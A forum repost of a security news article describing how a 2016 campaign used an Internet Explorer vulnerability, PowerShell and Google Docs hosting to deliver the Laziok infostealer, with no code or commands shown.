Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Share Post: Reddit Facebook
Windows PowerShell and Google Docs Abused to Spread Laziok Trojan
#1
[Image: windows-powershell-and-google-docs-abuse...3367-2.jpg]
During the month of March 2016, a threat group has used a combination of exploits in Internet Explorer, the no-limits scripting of Windows PowerShell, and malware stored on Google Docs to infect targets with the Loziak trojan.

The Loziak trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on companies from the energy sector in countries from the Middle East.

Loziak is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.
"Attack starts with malicious JavaScript code hosted on a Polish server"

Malware analysts from security firm FireEye stumbled upon this threat while sifting through telemetry data, and say that in this particular distribution campaign, crooks were using malicious JavaScript hosted on a Polish server.

When a victim using the Internet Explorer browser would get tricked into accessing a page hosting the malicious code, an exploit would execute, leverage the CVE-2014-6332 vulnerability and execute VBScript via Internet Explorer.

All IE versions from 3 to 11 are vulnerable, and the crooks would enter a so-called GodMode on the user's machine. From here, the crooks would use Windows PowerShell scripts to download the Loziak executable from a Google Docs URL.
"Loziak is a perfect reconnaissance tool"

Loziak is installed, and the trojan immediately starts collecting information on its targets. The infostealer would collect information on the computer's name, CPU details, RAM size, location (country), and if the user had any antivirus software installed.

The data would then be sent to the crooks' servers, where it will probably be used in other attacks if they didn't happen yet.

Security researchers found it extremely curious that crooks managed to host Loziak on Google's servers. Google is known to run automated virus scans on all the files hosted on its servers.
source
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hackers Using Cracked Software on GitHub to Spread RisePro Info Stealer mrtrout 0 298 03-16-2024 , 04:20 PM
Last Post: mrtrout
  Hackers now use Microsoft OneNote attachments to spread malware tarekma7 0 615 01-24-2023 , 10:21 AM
Last Post: tarekma7
  Customized Trojan Stole Data From 3M Windows PC Users mrtrout 0 685 07-02-2021 , 05:51 AM
Last Post: mrtrout
  COVID-Related Threats, PowerShell Attacks Lead Malware Surge Mohammad.Poorya 0 957 04-15-2021 , 05:33 AM
Last Post: Mohammad.Poorya
  Google shares PoC exploit for critical Windows 10 Graphics RCE bug Bjyda 1 1,133 02-28-2021 , 05:53 AM
Last Post: Mohammad.Poorya

Forum Jump:


Users browsing this thread: 1 Guest(s)